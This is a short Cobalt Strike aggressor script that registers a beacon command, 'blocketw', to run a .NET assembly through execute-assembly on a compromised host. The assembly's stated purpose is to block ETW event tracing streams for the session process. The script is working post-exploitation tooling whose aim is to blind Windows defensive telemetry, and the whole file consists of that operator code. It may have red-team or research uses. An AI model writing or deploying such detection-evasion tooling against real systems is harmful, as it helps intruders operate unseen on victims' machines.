beacon_command_register("blocketw", "Blocks etw streams for running session process",
	"Usage: blocketw [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias blocketw{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/dotnet/blocketw.exe";
	$desc = "blocketw";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}